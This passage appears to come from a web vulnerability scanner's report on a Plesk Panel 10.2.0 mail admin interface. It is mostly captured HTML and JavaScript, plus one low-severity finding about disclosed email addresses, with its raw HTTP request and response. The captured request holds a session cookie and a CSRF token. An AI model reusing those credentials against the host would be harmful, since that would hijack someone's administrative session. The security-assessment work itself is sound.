</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-2@nosedivesailing.com</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="format-2" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/list

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/email-address/list HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/4
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:57:44 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:57:44 GMT
Connection: close
Content-Length: 21565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Mail - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Flist' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Mail</span></h2>
</div>
</div>


<div class="msg-box msg-info"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Information:</span> The settings of e-mail address format-2@nosedivesailing.com were saved. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"E-mail Addresses","href":"\/email-address\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Mailing Lists","href":"\/mail-list\/list","containerCls":""}] });
});
//]]>
</script>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>
<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Hint({
renderTo: 'main',
hint: 'Create and manage e-mail accounts associated with your domains. For each e-mail account, you can set up a mailbox, a number of additional e-mail addresses that will point to the same mailbox (e-mail aliases), an auto-reply, and mail forwarding to one or several e-mail addresses. You can also set up protection from spam and viruses, if these services are available for your account.' });

new Jsw.List({
id: 'email-addresses-list',
renderTo: 'main',
